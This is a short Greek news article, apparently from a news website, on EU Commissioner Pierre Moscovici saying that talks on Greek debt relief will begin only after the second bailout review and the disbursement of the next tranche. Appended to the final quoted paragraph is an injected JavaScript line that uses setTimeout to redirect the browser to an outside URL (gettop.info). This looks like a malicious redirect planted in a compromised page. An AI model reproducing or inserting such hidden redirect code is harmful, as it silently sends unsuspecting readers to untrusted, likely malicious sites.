Μοσκοβισί: Μετά τη δεύτερη αξιολόγηση θα έρθει ο χρόνος για το χρέος

0
5

 

Για την ελάφρυνση του ελληνικού χρέους μίλησε ο Επίτροπος Οικονομικών Υποθέσεων Πιερ Μοσκοβισί προσερχόμενος στη συνεδρίαση του eco/fin και σημείωσε ότι αυτό το θέμα δεν πρόκειται να ανοίξει εάν δεν ολοκληρωθεί η δεύτερη αξιολόγηση.

Όπως σημείωσε ο κ. Μοσκοβισί «οι συζητήσεις για το χρέος δεν έχουν ξεκινήσει και δεν θα πρόκειται να τροφοδοτήσουμε σενάρια και θεωρίες. Όλοι θα πρέπει να αναλάβουν τις ευθύνες που τους αναλογούν. Οι Έλληνες αναλαμβάνουν τις ευθύνες τους, εμείς αναλαμβάνουμε τις ευθύνες μας. Στο τέλος όλοι μαζί θα είμαστε – ελπίζω και το ΔΝΤ, που αποτελεί στρατηγικός εταίρος μας».

Σχετικά με την απόφαση να δοθούν τμηματικά τα χρήματα στην Ελλάδα υπογράμμισε: «Προχωράμε βήμα, βήμα. Χθες κάναμε ένα σημαντικό βήμα φθάνοντας σε έναν συμβιβασμό, μία συμφωνία καλύτερα, μετά την υλοποίηση των 15 προαπαιτούμενων μέτρων εκ μέρους της Ελλάδας. Θέλω μάλιστα να χαιρετίσω τις ελληνικές Αρχές για τη δουλειά που έχουν κάνει. Τώρα θα ακολουθήσει μία τεχνική διεργασία για τις επόμενες ημέρες – λίγες εβδομάδες και έπειτα θα μπορέσουμε να εκταμιεύσουμε την υποδόση. Τότε θα ανοίξουμε και τη δεύτερη αξιολόγηση και θα πρέπει να την κλείσουμε γρήγορα. Μετά θα έρθει ο χρόνος για το χρέος…». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here